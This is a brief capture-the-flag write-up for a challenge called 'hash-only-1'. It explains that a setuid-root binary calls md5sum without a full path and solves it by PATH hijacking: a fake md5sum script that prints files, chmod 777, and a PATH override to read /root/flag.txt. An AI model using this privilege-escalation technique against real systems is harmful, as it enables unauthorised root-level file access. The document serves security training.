hash-only-1

decompiling the binary gives:

setgid(0);
setuid(0);
// ...
system("/bin/bash -c 'md5sum /root/flag.txt'");

system() call is made after elevating privileges to root...

Create a malicious md5sum script in /home/ctf-player/:

#!/bin/bash
cat "$1"

Give permissions, modify PATH and run the binary:

chmod 777 ./md5sum
export PATH=/home/ctf-player:$PATH
./flaghasher